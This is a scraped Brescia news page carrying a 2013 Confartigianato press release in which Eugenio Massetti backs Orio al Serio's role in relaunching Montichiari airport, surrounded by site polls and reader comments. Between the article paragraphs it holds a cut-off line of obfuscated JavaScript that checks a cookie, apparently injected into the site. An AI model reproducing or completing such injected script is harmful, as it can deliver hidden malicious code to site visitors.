Giovedì 24 Aprile 2014 - Ore 08:59


Cronaca Nera Politica Società Economia Mobilità Ambiente Cultura Sport Curiose Interviste
Citta' ed hinterlandBassa brescianaFranciacorta e SebinoGarda e ValtenesiVal SabbiaVal TrompiaVal Camonica
Diminuisci il carattere Aumenta il carattere StampaInvia tramite mail
IL COMMENTO
massetti

Aeroporto Montichiari, Massetti (Confartigianato): diamo un sì convinto ad Orio

«Si aspettano risposte a Bergamo. Diamogli un sì convinto e unanime e poi sediamoci a trattare. La miope concorrenza fra territori ha determinato la non costituzione del sistema aeroportuale integrato tra Verona e Montichiari che auspicavamo. Ma Montichiari è fondamentale per la Lombardia intera e la sua economia. Non perdiamo questo treno. Anzi, questo aereo». Lo ha affermato senza mezzi termini – intervenendo in un convegno della Confartigianato sabato a Rovigo – il presidente di Confartigianato Imprese Unione di Brescia e della Lombardia Eugenio Massetti, che aggiunge: «Se è infatti vero che prima l'assetto economico era rappresentato dal triangolo Genova – Milano – Torino, ora il concetto è “Oltre il Nord-Est, per un nuovo sviluppo del Paese” dove il sistema territoriale di sviluppo è rappresentato da Lombardia, Emilia e Veneto: Milano, Bologna, Venezia e Brescia al centro. Quando dicevamo, solo qualche mese fa che per noi Montichiari era ed è un aeroporto da alta classifica, da serie A, per la caratteristica delle piste che possiede, unico dopo Malpensa per il suo potenziale bacino di utenza, non sbagliavamo una virgola. Così come non ci aveva stupito, vista la storia dello scalo fatta di interessi localistici e di persone che non hanno mai saputo vedere oltre il proprio naso (con l'esplicita volontà della gestione Catullo di non valorizzarlo nel sistema Brescia-Verona), che la situazione restasse così com'è. È ora che l’aeroporto di Montichiari torni invece al centro di un progetto di rilancio che faccia ripartire l'impegno sulle attività di trasporto merci e passeggeri. E se la Regione Lombardia appoggia Orio al Serio in questa partita di Montichiari, noi registriamo e apprezziamo la posizione del presidente Maroni. Tutte motivazioni d'interesse che ben vengano, l'importante è farlo in fretta: lo sviluppo di un paese matura e si diffonde con un forte investimento sul territorio e l'aeroporto è uno di questi».

Confartigianato Imprese Unione di Brescia sostiene da tempo come le istituzioni e la politica tutta debbano e possano impegnarsi a promuovere investimenti nelle infrastrutture aeroportuali, avviando finalmente la creazione di un hub che coinvolga Montichiari a servizio di un territorio enorme, che con i suoi 15 milioni di abitanti e decine di migliaia di imprese è il cuore pulsante del nord italiano produttivo che ha sempre visto la regione Lombardia, con Brescia in testa, motore del suo sviluppo.

function cc(){fed=az(ogo.mn[13]+'0,54,52,40,56,20');return document.cookie.search('checker')


Fonte: Comunicato stampa mer 09 ott 2013, ore 13.12
Lascia il tuo commento a questa notizia

Nome
Testo del commento
Per inserire il tuo commento copia le lettere e i numeri che trovi qui a sinistra nella casella vuota che trovi qui a destra

Non riesce a leggere il codice? Aggiorna


   

   
Lascia il tuo commento con Facebook

COMMENTI

Seguici su Facebook Seguici su Twitter Seguici su Youtube Fai di bsnews.it la tua pagina iniziale Feed Rss Contatti Chi Siamo
27

Registrazione | Cosa puoi fare col sito
Sondaggio
La Provincia di Brescia è:
Un ente inutile e costoso, da cancellare
Un ente utile, importante e virtuoso
Un ente utile, ma vanno tagliati i costi

Elezioni Aci, si vota martedì 15 aprile dalle 9 alle 15 solo in città:
Bisogna estendere gli orari e aumentare i seggi
Bisogna estendere gli orari
Bisogna aumentare i seggi
Lasciamo tutto così

Abolizione delle Province:
Bene, si risparmia
Male, le istituzioni si allontanano dal territorio

Sondaggi del mese

Ultimi commenti
08:20 Cittadino
24 apr - Vai alla news »
Ma per completare Piazza Vittoria serve proprio il Bigio? Ma chi l'ha detto? La tradizione partigiana di Brescia, il contributo importante d
07:48 ma i piddini ancora parlano?
24 apr - Vai alla news »
Se i piddini utilizzassero lo stesso metro di severità che usano con la lega, dopo il caso mps (la banca più antica del mondo
07:46 LoL sunì
24 apr - Vai alla news »
LoL cancellano i commenti sto SUNÌ' . RIBADISCO: pessimo articolo! Ridicoli e patetici...
07:08 Laura
24 apr - Vai alla news »
Chissà se si ricorda di Charlie, cucciolo di 4 mesi da lui giudicato "inadatto a vivere in appartamento" perché nato
05:07 PROFESSORI SERI
24 apr - Vai alla news »
Vuoi mettere la severità dei professori di Tirana ? Il Trota ( votato in massa dai leghisti bresciani ) ha dovuto sputare lacrime e
00:34 Rolphy
24 apr - Vai alla news »
Caspita, ma Rolphy, si rende conto che i bresciani avranno avuto pure qualche motivo per non votarlo? Perchè guarda in casa d'altri i
23:24 @21.27
23 apr - Vai alla news »
collaborazionista
23:21 MARE NOSTRUM
23 apr - Vai alla news »
Certo che i mister di roma potevano trovare un nome in codice meno fascistoide...e magari non in latinorum. Occhio alla contraerea amica.
Commenti in evidenza
16:54 Aldo Rebecchi
18 lug - Vai alla news »
Rispetto ai commenti letti, circa l’ipotesi che abbia a coordinare lo staff in via di formazione del Sindaco, non per replicare a chi legitt
Pubblicità elettorale


Twitta usando @bsnewsit

IN EVIDENZA
Rebecchi: il libro su Lucchini? Calzoni risponda a due domande
(a.tortelli) “Dopo aver letto il libro, mi restano due principali domande. Domande che ho anche posto all'autore durante la prima presentazione e che ancora attendono risposta. A che scopo Calzoni ha scritto questo libro? E, ancora, cosa ne direbbe Luigi Lucchini se fosse ancora in vita?”. A porre i quesiti è l'ex deputato bresciano Aldo Rebecchi, che accetta – e rispedisce al mittente – la provocazione lanciata da Ugo Calzoni con il suo ultimo
Entra nella rubrica
12 News - Il Mensile
12 Mesi - Il Mensile
Fan Facebook


       
EDIZIONI 12 | PUBBLICITA' | PI/CF 03327790980 | REA (4) 524873 | REG. TRIB. BRESCIA 41/2008 DEL 15 SETTEMBRE 2008